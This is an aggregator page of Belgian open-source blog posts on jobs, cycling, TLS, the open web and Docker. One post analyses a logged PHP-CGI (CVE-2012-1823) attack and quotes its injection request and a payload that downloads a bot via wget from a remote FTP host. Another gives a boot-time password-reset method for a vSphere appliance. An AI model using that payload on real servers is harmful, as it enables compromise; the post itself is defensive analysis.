Subscriptions

Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

June 29, 2015

Lionel Dricot

Les 5 réponses à ceux qui veulent préserver l’emploi

3226545588_0994d1ddba_z

 

Si vous avez été redirigé vers cette page, c’est que d’une manière ou d’une autre vous vous êtes inquiété pour la préservation d’un type d’emploi voire que vous avez même proposé des idées pour sauvegarder ou créer de l’emploi.

Les 5 arguments contre la préservation de l’emploi

Chacun des arguments peut être approfondi en cliquant sur le ou les liens appropriés.

1. La technologie a pour but premier de nous faciliter la vie et, en conséquence, de réduire notre travail. Détruire l’emploi n’est donc pas une conséquence de quoi que ce soit, c’est le but premier que recherche notre espèce depuis des millénaires ! Et nous sommes en train de réussir ! Pourquoi voudrions-nous revenir en arrière afin d’atteindre l’inefficace plein-emploi ?

2. Le fait de ne pas travailler n’est pas un problème. C’est le fait de ne pas avoir d’argent pour vivre qui l’est. Nous avons malheureusement tendance à confondre le travail et le social. Nous sommes convaincus que seul le travail rapporte de l’argent mais c’est une croyance complètement erronée. Pour approfondir : Qu’est-ce que le travail ?

3. Vouloir créer de l’emploi revient à creuser des trous pour les reboucher. C’est non seulement stupide, c’est également contre-productif et revient à construire la société la plus inefficace possible !

4. Si créer/préserver l’emploi est un argument recevable dans un débat, alors absolument tout peut être justifiable : depuis la destruction de nos ressources naturelles à la torture et la peine de mort en passant par le sacrifice de milliers de vies sur les routes. C’est ce que j’appelle l’argument du bourreau.

5. Quel que soit votre métier, il pourra être fait mieux, plus vite et moins cher par un logiciel dans la décennie qui vient. C’est bien sûr évident quand on pense aux chauffeurs de taxi/Uber mais cela comprend également les artistes, les politiciens et même les chefs d’entreprises.

 

Conclusion : s’inquiéter pour l’emploi est dangereusement rétrograde. Ce n’est pas facile car on nous bourre le crâne avec cette superstition mais il est indispensable de passer à l’étape suivante. Que l’on apprécie l’idée ou pas, nous sommes déjà dans une société où tout le monde ne travaille pas. C’est un fait et le futur n’a que faire de votre opinion. La question n’est donc pas de créer/préserver l’emploi mais de s’organiser dans une société où l’emploi est rare.

Personnellement, je pense que le revenu de base, sous une forme ou une autre, est une piste à explorer sérieusement.

 

Photo par Friendly Terrorist.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at June 29, 2015 06:51 PM

Bert de Bruijn

How to solve "user locked out due to failed logins" in vSphere vMA

In vSphere 6, if the vi-admin account get locked because of too many failed logins, and you don't have the root password of the appliance, you can reset the account(s) using these steps:

  1. reboot the vMA
  2. from GRUB, "e"dit the entry
  3. "a"ppend init=/bin/bash
  4. "b"oot
  5. # pam_tally2 --user=vi-admin --reset
  6. # passwd vi-admin # Optional. Only if you want to change the password for vi-admin.
  7. # exit
  8. reset the vMA
  9. log in with vi-admin
These steps can be repeated for root or any other account that gets locked out.

If you do have root or vi-admin access, "sudo pam_tally2 --user=mylockeduser --reset" would do it, no reboot required.

by Bert de Bruijn (noreply@blogger.com) at June 29, 2015 01:13 PM

Laurent Bigonville

systemd integration is the “ps” command

In Debian, since version 2:3.3.10-1, the procps package has the systemd integration bits enabled. This means that now the “ps” command can display which (user) unit has started a process or to which slice or scope it belongs.

For example with the following command:

ps  -eo pid,user,command,unit,uunit,slice

ps-systemd

by bigon at June 29, 2015 10:29 AM

June 27, 2015

Mattias Geniar

The Broken State of Trust In Root Certificates

The post The Broken State of Trust In Root Certificates appeared first on ma.ttias.be.

Yesterday news came out that Microsoft has quietly pushed new Root Certificates via its Windows Update system.

The change happened without any notifications, without any KB and without anyone really paying attention to it.

Earlier this month, Microsoft has quietly started pushing a bunch of new root certificates to all supported Windows systems. What is concerning is that they did not announce this change in any KB article or advisory, and the security community doesn't seem to have noticed this so far.

Even the official Microsoft Certificate Program member list makes no mention of these changes whatsoever.

Microsoft quietly pushes 18 new trusted root certificates

This just goes to show how fragile our system of trust really is. Adding new Root Certificates to an OS essentials gives the owner of that certificate (indirect) root privileges on the system.

It may not allow direct root access to your machines, but it allows them to publish certificates your PC/server blindly trusts.

This is an open door for phishing attacks with drive-by downloads.

I think this demonstrates 2 very major problems with SSL Certificates we have today:

  1. Nobody checks which root certificates are currently trusted on your machine(s).
  2. Our software vendors can push new Root Certificates in automated updates without anyone knowing about it.

Both problems come back to the basis of trust.

Should we blindly trust our OS vendors to be able to ship new Root Certificates without confirmation, publication or dialog?

Or do we truly not care at all, as demonstrated by the fact we don't audit/validate the Root Certificates we have today?

The post The Broken State of Trust In Root Certificates appeared first on ma.ttias.be.

by Mattias Geniar at June 27, 2015 12:53 PM

June 26, 2015

Xavier Mertens

Attackers Make Mistakes But SysAdmins Too!

Keep Calm & Avoid ErrorsA few weeks ago I blogged about “The Art of Logging” and explained why it is important to log efficiently to increase changes to catch malicious activities. They are other ways to catch bad guys, especially when they make errors, after all they are humans too! But it goes the other way around too with system administrators. Last week, a customer asked me to investigate a suspicious alert reported by an IDS. It looked like an restricted web server (read: which was not supposed to be publicly available!) was hit by an attack coming from the wild Internet.

The attack had nothing special, it was a bot scanning for websites vulnerable to the rather old PHP CGI-BIN vulnerability (CVE-2012-1823). The initial HTTP request looked strange:

POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%
75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F
%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%
66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6
E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%
3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3
D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F
%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Oracle-ECID: 252494263338,0
ClientIP: xxx.xxx.xxx.xxx
Chronos: aggregate
SSL-Https: off
Calypso-Control: H_Req,180882440,80
Surrogate-Capability: orcl="webcache/1.0 Surrogate/1.0 ESI/1.0 ESI-Inline/1.0 ESI-INV/1.0 ORAESI/9.0.4 POST-Restore/1.0"
Oracle-Cache-Version: 10.1.2
Connection: Keep-Alive, Calypso-Control

<? system("cd /tmp;wget ftp://xxxx:xxxx\@xxx.xxx.xxx.xxx/bot.php"); ?>

Once decoded, the HTTP query looks familiar:

POST //cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input –n

Did you see that the header ‘Host’ contains an invalid value? (‘-c’). I tried to understand this header but for me it’s a bug in the attacker’s code. The RFC2616 covers the HTTP/1.1 protocol and more precisely how requests are formed:

$ nc blog.rootshell.be 80
GET / HTTP/1.1
Host: blog.rootshell.be
HTTP/1.1 200 OK

In the case above, the request was clearly malformed and the reverse proxy sitting in front of the web server decided to forward it to its default web server. If a reverse proxy can’t find a valid host to send the incoming requests, it will use, based on its configuration, the default one. Let’s take an Apache config:

NameVirtualHost *
<VirtualHost *>
DocumentRoot /siteA/
ServerName www.domainA.com
</VirtualHost>
<VirtualHost *>
DocumentRoot /siteB/
ServerName www.domainB.com
</VirtualHost>

In this example, Apache will use the first block if no other matching block is found. If we query a virtual host ‘www.domainC.com‘, we will receive the homepage of ‘www.domainA.com‘. Note that such configuration may expose sensitive data into the wild or expose a vulnerable server to the Internet. To prevent this, always add a default site with an extra block on top of the configuration:

<VirtualHost *>
DocumentRoot /defaultSite/
</VirtualHost>

This site can be configured as a “last resort web page” (like implemented in many load-balancers) and why not run a honeypot to collect juicy data? Conclusion: From an defender point of view, try to isolate invalid queries as much as possible and log everything. From an attacker point of view, always try malformed HTTP queries, maybe you will find interesting web sites hosted on the same server!

by Xavier at June 26, 2015 10:21 PM

Mattias Geniar

RFC 7568: SSL 3.0 Is Now Officially Deprecated

The post RFC 7568: SSL 3.0 Is Now Officially Deprecated appeared first on ma.ttias.be.

The IETF has taken an official stance in the matter: SSL 3.0 is now deprecated.

It's been a long time coming. We've had, as many others, SSL 3.0 disabled on all our servers for multiple years now. And I'm now happy to report the IETF is making the end of SSL 3.0 "official".

The Secure Sockets Layer version 3.0 (SSLv3), as specified in RFC 6101, is not sufficiently secure. This document requires that SSLv3 not be used.

The replacement versions, in particular, Transport Layer Security (TLS) 1.2 (RFC 5246), are considerably more secure and capable protocols.

RFC 7568: Deprecating Secure Sockets Layer Version 3.0

Initiatives like disablessl3.com have been around for quite a while, urging system administrators to disable SSLv3 wherever possible. With POODLE as its most known attack, the death of SSLv3 is a very welcome one.

The RFC targets everyone using SSL 3.0: servers as well as clients.

Pragmatically, clients MUST NOT send a ClientHello with ClientHello.client_version set to {03,00}.

Similarly, servers MUST NOT send a ServerHello with ServerHello.server_version set to {03,00}. Any party receiving a Hello message with the protocol version set to {03,00} MUST respond with a "protocol_version" alert message and close the connection.

SSL is dead. Long live TLS 1.2(*).

(*) while it lasts.

The post RFC 7568: SSL 3.0 Is Now Officially Deprecated appeared first on ma.ttias.be.

by Mattias Geniar at June 26, 2015 07:39 PM

Frank Goossens

Music from Our Tube; Souldancing on a Friday

While listening to random old “It is what it is”-shows (Merci Laurent) I heard this re-issue of Heiko Laux‘s Souldancer. No go have some fun you kids!

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 26, 2015 11:25 AM

June 25, 2015

Joram Barrez

All Activiti Community Day 2015 Online

As promised in my previous post, here are the recordings of the talks done by our awesome Community people. The order below is the order at which they were planned in the agenda (no favouritism!). Sadly, the camera battery died during the recording of the talks before lunch. As such, the talks of Yannick Spillemaeckers […]

by Joram Barrez at June 25, 2015 12:04 PM

June 23, 2015

Lionel Dricot

Le « gravel » ou quand les cyclistes bouffent du gravier

20150620_141422

Attention, ce bolg est bien un bolg sur le cyclimse. Merci de votre compréhension !

Dans cet article, j’aimerais présenter une discipline cycliste très populaire aux États-Unis : le « gravel grinding », qui signifie littéralement « broyage de gravier », plus souvent appelé « gravel ».

Mais, pour ceux qui ne sont pas familiers avec le vélo, je vais d’abord expliquer pourquoi il y a plusieurs types de vélos et plusieurs façons de rouler en vélo.

 

Les différents types de cyclisme

Vous avez certainement déjà remarqué que les vélos des coureurs du tour de France sont très différents du VTT que vient d’acquérir votre petite nièce.

4805478269_dd774e0a41_z

Un cycliste sur route, par Tim Shields.

En effet, en fonction du parcours, le cycliste sera confronté à des obstacles différents. Sur une longue route dans un environnement venteux, le cycliste sera principalement freiné par la résistance de l’air. Il doit donc être aérodynamique. Sur un étroit lacet de montagne, le cycliste se battra contre la gravité et doit donc être le plus léger possible. Par contre, s’il emprunte un chemin de pierres descendant entre les arbres, le principal soucis du cycliste sera de garder les roues en contact avec le sol et de ne pas casser son matériel. Le vélo devra donc amortir au maximum les chocs et les aspérités du terrain.

Enfin, un vélo utilitaire cherchera lui à maximiser le confort du cycliste et l’aspect pratique du vélo, même au prix d’une baisse drastique des performances.

 

Les compromis technologiques

Aujourd’hui, les vélos sont donc classés en fonction de leur utilisation. Un vélo très aérodynamique sera utilisé pour les compétitions de contre-la-montre ou les triathlons. Pour les courses classiques, les pros utilisent un vélo de route de type “aéro” ou un vélo ultra léger en montagne.

7841128798_7b8c77d742_z

Vélo aérodynamique en contre-la-montre, par Marc

Pour rouler dans les bois, on préfèrera un VTT mais les VTT eux-mêmes se déclinent en plusieurs versions, le plus éloigné du vélo de route étant le vélo de descente qui est très lourd, bardé d’amortisseurs et qui, comme son nom l’indique, ne peut servir qu’en descendant.

Ceci dit, la plupart de ces catégories sont liées à des contraintes technologiques. Ne pourrait-on pas imaginer un vélo ultra-léger (adapté à la montagne) qui soit ultra-aérodynamique (adapté à la route ou au contre-la-montre) et ultra-confortable (adapté à la ville) ? Oui, on peut l’imaginer. Ce n’est pas encore possible aujourd’hui et rien ne dit que ce le sera un jour. Mais ce n’est théoriquement pas impossible.

 

Le compromis physique

Par contre, il existe un compromis qui lui est physiquement indiscutable : le rendement par rapport à l’amortissement. Tout amortissement entraîne une perte de rendement, c’est inévitable.

L’amortissement a deux fonctions : maintenir le vélo en contact avec la route même sur une surface inégale et préserver l’intégrité physique du vélo voire le confort du cycliste.

Le cycliste va avancer en appliquant une force sur la route à travers son pédalier et ses pneus. Le principe d’action-réaction implique que la route applique une force proportionnelle sur le vélo, ce qui a pour effet de le faire avancer.

L’amortissement, lui, a pour objectif de dissiper les forces transmises au vélo par la route. Physiquement, on voit donc bien que rendement et amortissement sont diamétralement opposé.

2213372852_6261e6b987_z

Un vélo de descente, par Matthew.

Pour vous en convaincre, il suffit d’emprunter un vélo pourvu d’amortisseurs et de régler ceux-ci sur amortissement maximal. Tentez ensuite de gravir une route montant fortement pendant plusieurs centaines de mètres. Vous allez immédiatement percevoir que chaque coup de pédale est partiellement amorti par le vélo.

 

Montre-moi tes pneus et je te dirai qui tu es…

L’amortisseur principal présent sur tous les types de vélos sans exception est le pneu. Le pneu est remplit d’air. La compression de l’air atténue les chocs.

Une idée largement répandue veut que les vélos de routes aient des pneus fins car les pneus larges augmentent le frottement sur la route. C’est tout à fait faux. En effet, tous les pneus cherchent à frotter au maximum sur la route car c’est ce frottement qui transmet l’énergie. Un pneu qui ne frotte pas sur la route patine, ce que l’on souhaite éviter à tout prix.

Il a même été démontré que des pneus plus larges permettaient de transmettre plus d’énergie à la route et étaient plus efficaces. C’est une des raisons pour lesquelles les Formule 1 ont des pneus très larges.

Cependant des pneus très larges signifient également plus d’air et donc plus d’amortissement. Les pneus larges dissipent donc plus d’énergie à chaque coup de pédale !

8148010012_1fa18fe3d1_z

Roues de VTT, par Vik Approved.

C’est pourquoi les vélos de route ont des pneus très fin (entre 20 et 28mm d’épaisseur). Ceux-ci sont également gonflés à très haute pression (plus de 6 bars). La quantité d’air étant très petite et très comprimée, l’amortissement est minimal.

Par contre, en se déformant les pneus larges permettent d’épouser les contours d’un sol inégal. En amortissant les chocs, ils sont également moins sensibles aux crevaisons. C’est la raison pour laquelle les VTT ont des pneus qui font généralement plus de 40mm d’épaisseur et qui sont moins gonflés (entre 2 et 4 bars). Des pneus plus fins patineraient (perte d’adhérence) et crèveraient au moindre choc.

En résumé, le pneu est certainement l’élément qui définit le plus un vélo, c’est véritablement sa carte d’identité. Pour en savoir plus, voici un lien très intéressant sur la résistance au roulement des pneus.

 

Entre la route et le VTT

Nous avons donc défini deux grandes familles de vélos sportifs. Tout d’abord les vélos de routes, avec des pneus de moins de 30mm, taillés pour la vitesse sur une surface relativement lisse mais incapables de rouler hors du bitume. Ensuite les VTTs, avec des pneus de plus de 40mm, capables de passer partout mais qui sont tellement inefficaces sur la route qu’il est préférable de les emmener en voiture jusqu’à l’endroit où l’on veut pratiquer. Il existe également bien d’autres types de vélos mais ils sont moins efficaces en terme de performance : le city-bike, inspiré du VTT qui optimise l’aspect pratique, le « hollandais », qui optimise le confort dans un pays tout plat aux pistes cyclables bien entretenues ou le fixie, qui optimise le côté hipster de son possesseur.

Mais ne pourrait-on pas imaginer un vélo orienté performance qui serait efficace sur route et qui pourrait passer partout où le VTT passe ?

Pour répondre à cette question, il faut se tourner vers une discipline particulièrement populaire en Belgique : le cyclocross. Le cyclocross consiste à prendre un vélo de route, à lui mettre des pneus un peu plus larges (entre 30 et 35mm) et à le faire rouler dans la boue en hiver. Lorsque la boue est trop profonde ou que le terrain est trop pentu, le cycliste va descendre de sa machine, l’épauler et courir tout en la portant. L’idée est que, dans ces situations, il est de toutes façons plus rapide de courir (10-12km/h) que de pédaler (8-10km/h).

16349387856_4def3a1116_z

Une coureuse de cyclocross, par Sean Rowe

Le vélo de cyclocross doit donc être léger (pour le porter), capable de rouler et virer dans la boue mais avec un amortissement minimal pour être performant sur les passages les plus lisses.

Ce type de configuration se révèle assez efficace sur la route : un vélo de cyclo-cross roule sans difficulté au-delà des 30km/h mais permet également de suivre un VTT traditionnel dans les chemins forestiers. L’amortissement moindre nécessitera cependant de diminuer la vitesse dans les descentes très rugueuses. Les montées les plus techniques sur les sols les plus gras nécessiteront de porter le vélo (avec parfois le résultat inattendu de dépasser les vététistes en train de mouliner).

 

La naissance du gravel

Si une course de vélo de route peut se parcourir sur des longues distances entre un départ et une arrivée, le cyclo-cross, le VTT et les autres disciplines sont traditionnellement confinées à un circuit court que les concurrents parcourent plusieurs fois. La première raison est qu’il est de nos jours difficile de concevoir un long parcours qui ne passera pas par la route.

De plus, si des motos et des voitures peuvent accompagner les vélos de routes pour fournir le ravitaillement, l’aide technique et la couverture médiatique, il n’en est pas de même pour les VTTs. Impossible donc de filmer correctement une course de VTT ou de cyclocross qui se disputerait sur plusieurs dizaines de km à travers les bois.
20150517_172633

Le  genre de route qui donne son nom à la discipline.

L’idée sous-jacente du « gravel » est de s’affranchir de ces contraintes et de proposer des courses longues (parfois plusieurs centaines de km) entre un départ et une arrivée mais en passant par des sentiers, des chemins encaissés et, surtout, ces longues routes en gravier qui sillonnent les États-Unis entre les champs et qui ont donné leur nom à la discipline. Le passage par des routes asphaltées est également possible.

Des points de ravitaillements sont prévus par les organisateurs le long du parcours mais, entre ces points, le cyclistes sera le plus souvent laissé à lui-même. Transporter des chambre à air, du matériel de réparation et des sparadraps fait donc partie du sport !

Quand à la couverture média, elle sera désormais effectuée par les cyclistes eux-mêmes grâce à des caméras embarquées sur les vélos ou sur les casques.

 

L’essor du gravel

Au fond, il n’y a rien de vraiment neuf. Le mot « gravel » n’est jamais qu’un nouveau mot accolé à une discipline vieille comme le vélo lui-même. Mais ce mot « gravel » a permis une renaissance et une reconnaissance du concept.

Le succès des vidéos embarquées de cyclistes parcourant 30km à travers champs, 10km sur de l’asphalte avant d’attaquer 500m de côtes boueuses et de traverser une rivière en portant leur vélo contribuent à populariser le « gravel », principalement aux États-Unis où le cyclo-cross est également en plein essor.

La popularité de courses comme Barry-Roubaix (ça ne s’invente pas !) ou Gold Rush Gravel Grinder intéresse les constructeurs qui se mettent à proposer des cadres, des pneus et du matériel spécialement conçus pour le gravel.

 

Se mettre au gravel ?

Contrairement au vélo sur route ou au VTT sur circuit, le gravel comporte un volet romanesque. L’aventure, se perdre, explorer et découvrir font partie intégrante de la discipline. Dans l’équipe Deux Norh, par exemple, les sorties à vélo sont appelées des « quêtes » (hunt). L’intérêt n’est pas tant dans l’exploit sportif que de raconter une aventure, une histoire.

20150517_182129

L’auteur de ces lignes au cours d’une montée à travers bois.

Le gravel étant, par essence, un compromis, les vélos de cyclo-cross sont souvent les plus adaptés pour le pratiquer. D’ailleurs, beaucoup de cyclistes confirmés affirment que s’ils ne devaient avoir qu’un seul vélo pour tout faire, ce serait leur vélo de cyclo-cross. Cependant, il est tout à fait possible de pratiquer le gravel avec un VTT hardtail (sans amortissement arrière). Le VTT est plus confortable et passe plus facilement les parties techniques au prix d’une vitesse moindre dans les parties plus roulantes. Pour les parcours les plus sablonneux, certains vont jusqu’à s’équiper de pneus ultra-larges (les « fat-bikes »).

Par contre, je n’ai encore jamais vu de clubs de gravel ni la moindre course organisée en Belgique. C’est la raison pour laquelle j’invite les cyclistes belges à rejoindre l’équipe Belgian Gravel Grinders sur Strava, histoire de se regrouper entre gravelistes solitaires et, pourquoi pas, organiser des sorties communes.

Si l’aventure vous tente, n’hésitez pas à rejoindre l’équipe sur Strava. Et si vous deviez justement acheter un nouveau vélo et hésitiez entre un VTT ou un vélo de route, jetez un œil aux vélos de cyclo-cross. On ne sait jamais que vous aillez soudainement l’envie de bouffer du gravier !

 

Photo de couverture par l’auteur.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at June 23, 2015 04:17 PM

Dries Buytaert

Winning back the Open Web

The web was born as an open, decentralized platform allowing different people in the world to access and share information. I got online in the mid-nineties when there were maybe 100,000 websites in the world. Google didn't exist yet and Steve Jobs had not yet returned to Apple. I remember the web as an "open web" where no one was really in control and everyone was able to participate in building it. Fast forward twenty years, and the web has taken the world by storm. We now have a hundreds of millions of websites. Look beyond the numbers and we see another shift: the rise of a handful of corporate "walled gardens" like Facebook, Google and Apple that are becoming both the entry point and the gatekeepers of the web. Their dominance has given rise to major concerns.

We call them "walled gardens" because they control the applications, content and media on their platform. Examples include Facebook or Google, which control what content we get to see; or Apple, which restricts us to running approved applications on iOS. This is in contrast to the "open web", where users have unrestricted access to applications, content and media.

Facebook is feeling the heat from Google, Google is feeling the heat from Apple but none of these walled gardens seem to be feeling the heat from an open web that safeguards our privacy and our society's free flow of information.

This blog post is the result of people asking questions and expressing concerns about a few of my last blog posts like the Big Reverse of the Web, the post-browser era of the web is coming and my DrupalCon Los Angeles keynote. Questions like: Are walled gardens good or bad? Why are the walled gardens winning? And most importantly; how can the open web win? In this blog post, I'd like to continue those conversations and touch upon these questions.

Are "walled gardens" good or bad for the web?

What makes this question difficult is that the walled gardens don't violate the promise of the web. In fact, we can credit them for amplifying the promise of the web. They have brought hundreds of millions of users online and enabled them to communicate and collaborate much more effectively. Google, Apple, Facebook and Twitter have a powerful democratizing effect by providing a forum for people to share information and collaborate; they have made a big impact on human rights and civil liberties. They should be applauded for that.

At the same time, their dominance is not without concerns. With over 1 billion users each, Google and Facebook are the platforms that the majority of people use to find their news and information. Apple has half a billion active iOS devices and is working hard to launch applications that keep users inside their walled garden. The two major concerns here are (1) control and (2) privacy.

First, there is the concern about control, especially at their scale. These organizations shape the news that most of the world sees. When too few organizations control the media and flow of information, we must be concerned. They are very secretive about their curation algorithms and have been criticized for inappropriate censoring of information.

Second, they record data about our behavior as we use their sites (and the sites their ad platforms serve) inferring information about our habits and personal characteristics, possibly including intimate details that we might prefer not to disclose. Every time Google, Facebook or Apple launch a new product or service, they are able to learn a bit more about everything we do and control a bit more about our life and the information we consume. They know more about us than any other organization in history before, and do not appear to be restricted by data protection laws. They won't stop until they know everything about us. If that makes you feel uncomfortable, it should. I hope that one day, the world will see this for what it is.

While the walled gardens have a positive and democratizing impact on the web, who is to say they'll always use our content and data responsibly? I'm sure that to most critical readers of this blog, the open web sounds much better. All things being equal, I'd prefer to use alternative technology that gives me precise control over what data is captured and how it is used.

Why are the walled gardens winning?

Why then are these walled gardens growing so fast? If the open web is theoretically better, why isn't it winning? These are important questions about future of the open web, open source software, web standards and more. It is important to think about how we got to a point of walled garden dominance, before we can figure out how an open web can win.

The biggest reason the walled gardens are winning is because they have a superior user experience, fueled by data and technical capabilities not easily available to their competitors (including the open web).

Unlike the open web, walled gardens collect data from users, often in exchange for free use of a service. For example, having access to our emails or calendars is incredibly important because it's where we plan and manage our lives. Controlling our smartphones (or any other connected devices such as cars or thermostats) provides not only location data, but also a view into our day-to-day lives. Here is a quick analysis of the types of data top walled gardens collect and what they are racing towards:

Walled gardens data

On top of our personal information, these companies own large data sets ranging from traffic information to stock market information to social network data. They also possess the cloud infrastructure and computing power that enables them to plow through massive amounts of data and bring context to the web. It's not surprising that the combination of content plus data plus computing power enables these companies to build better user experiences. They leverage their data and technology to turn “dumb experiences” into smart experiences. Most users prefer smart contextual experiences because they simplify or automate mundane tasks.

Walled gardens technology

Can the open web win?

I still believe in the promise of highly personalized, contextualized information delivered directly to individuals, because people ultimately want better, more convenient experiences. Walled gardens have a big advantage in delivering such experiences, however I think the open web can build similar experiences. For the open web to win, we first must build websites and applications that exceed the user experience of Facebook, Apple, Google, etc. Second, we need to take back control of our data.

Take back control over the experience

The obvious way to build contextual experiences is by combining different systems that provide open APIs; e.g. we can integrate Drupal with a proprietary CRM and commerce platform to build smart shopping experiences. This is a positive because organizations can take control over the brand experience, the user experience and the information flow. At the same time users don't have to trust a single organization with all of our data.

Open web current state

The current state of the web: one end-user application made up of different platform that each have their own user experience and presentation layer and stores its own user data.

To deliver the best user experience, you want “loosely-coupled architectures with a highly integrated user experience”. Loosely-coupled architectures so you can build better user experiences by combining your systems of choice (e.g. integrate your favorite CMS with your favorite CRM with your favorite commerce platform). Highly-integrated user experiences so can build seamless experiences, not just for end-users but also for content creators and site builders. Today's open web is fragmented. Integrating two platforms often remains difficult and the user experience is "mostly disjointed" instead of "highly integrated". As our respective industries mature, we must focus our attention to integrating the user experience as well as the data that drives that user experience. The following "marketecture" illustrates that shift:

Shared integration and user experience layer

Instead of each platform having its own user experience, we have a shared integration and presentation layer. The central integration layer serves to unify data coming from distinctly different systems. Compatible with the "Big Reverse of the Web" theory, the presentation layers is not limited to a traditional web browser but could include push technology like a notification.

For the time being, we have to integrate with the big walled gardens. They need access to great content for their users. In return, they will send users to our sites. Content management platforms like Drupal have a big role to play, by pushing content to these platforms. This strategy may sound counterintuitive to many, since it fuels the growth of walled gardens. But we can't afford to ignore ecosystems where the majority of users are spending their time.

Control personal data

At the same time, we have to worry about how to leverage people's data while protecting their privacy. Today, each of these systems or components contain user data. The commerce system might have data about past purchasing behavior, the content management system about who is reading what. Combining all the information we have about a user, across all the different touch-points and siloed data sources will be a big challenge. Organizations typically don't want to share user data with each other, nor do users want their data to be shared without their consent.

The best solution would be to create a "personal information broker" controlled by the user. By moving the data away from the applications to the user, the user can control what application gets access to what data, and how and when their data is shared. Applications have to ask the user permission to access their data, and the user explicitly grants access to none, some or all of the data that is requested. An application only gets access to the data that we want to share. Permissions only need to be granted once but can be revoked or set to expire automatically. The application can also ask for additional permissions at any time; each time the person is asked first, and has the ability to opt out. When users can manage their own data and the relationships they have with different applications, and by extension with the applications' organizations, they take control over their own privacy. The government has a big role to play here; privacy law could help accelerate the adoption of "personal information brokers".

Open web personal information broker

Instead of each platform having its own user data, we move the data away from the applications to the users, managed by a "personal information broker" under the user's control.

Open web shared broker

The user's personal information broker manages data access to different applications.

Conclusion

People don't seem so concerned about their data being hosted with these walled gardens since they've willingly given it to date. For the time being, "free" and "convenient" will be hard to beat. However, my prediction is that these data privacy issues are going to come to a head in the next five to ten years, and lack of transparency will become unacceptable to people. The open web should focus on offering user experiences that exceed those provided by walled gardens, while giving users more control over their user data and privacy. When the open web wins through improved transparency, the closed platforms follow suit, at which point they'll no longer be closed platforms. The best case scenario is that we have it all: a better data-driven web experience that exists in service to people, not in the shadows.

by Dries at June 23, 2015 08:58 AM

Frank Goossens

Mobile web vs. Native apps; Forrester’s take

So web is going away, being replaced by apps? Forrester researched and does not agree;

Based on this data and other findings in the new report, Forrester advises businesses to design their apps only for their best and most loyal or frequent customers – because those are the only one who will bother to download, configure and use the application regularly. For instance, most retailers say their mobile web sales outweigh their app sales, the report says. Meanwhile, outside of these larger players, many customers will use mobile websites instead of a business’ native app.

My biased interpretation; unless you think can compete with Facebook for mobile users’ attention, mobile apps should maybe not be your most important investment. Maybe PPK conceeded victory too soon after all?

by frank at June 23, 2015 07:45 AM

June 22, 2015

Frank Goossens

RIngland; de stilste zomerhit?

“Laat de mensen dansen” wordt dus verbannen van VRT en Q-music omdat het te politiek zou zijn. Nooit gedacht dat Bart & Slongs de Vlaamse Johnny & Sid zouden worden … Kan ik dat plaatje ergens kopen?

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 22, 2015 04:29 PM

June 21, 2015

Vincent Van der Kussen

A critical view on Docker

TL;DR Before you start reading this, I want to make it clear that I absolutely don't hate Docker or the application container idea in general, at all!. I really see containers become a new way of doing things in addition to the existing technologies. In fact, I use containers myself more and more.

Currently I'm using Docker for local development because it's so easy to get your environment up and running in just e few seconds. But of course, that is "local" development. Things start to get interesting when you want to deploy over multiple Docker hosts in a production environment.

At the "Pragmatic Docker Day" a lot of people who were using (some even in production) or experimenting with Docker showed up. Other people were completely new to Docker so there was a good mix.

During the Open Spaces in the afternoon we had a group of people who decided to stay outside (the weather was really to nice to stay inside) and started discussing the talks that were given in the morning sessions. This evolved in a rather good discussion about everyone's personal view on the current state of containers and what they might bring in the future. People chimed in and added their opinion to the conversation

That inspired me to write about the following items which are a combination of the things that came up during the conversations and my own view on the current state of Docker.

The Docker file

A lot of people are now using some configuration management tool and have invested quite some time in their tool of choice to deploy and manage the state of their infrastructure. Docker provides the Dockerfile to build/configure your container images and it feels a bit like a "dirty" way/hack to do this given that config management tools provide some nice features.

Quite some people are using their config management tool to build their container images. I for instance upload my Ansible playbooks into the image (during build) and then run them. This allows me to reuse existing work I know that works. And I can use it for both containers and non-containers.

It would have been nice if Docker somehow provided a way to integrate the exiting configuration management tools a bit better. Vagrant does a better job here.

As far as I know you also can't use variables (think Puppet Hiera or Ansible Inventory) inside your Dockerfile. Something configuration management tools happen to do be very good at.

Bash scripting

When building more complex Docker images you notice that a lot of Bash scripting is used to prep the image and make it do what you want. Things like passing variables into configuration files, creating users, preparing storage, configure and start services, etc.. While Bash is not necessarily a bad thing, it all feels like a workaround for things that are so simple when not using containers.

Dev vs Ops all over again?

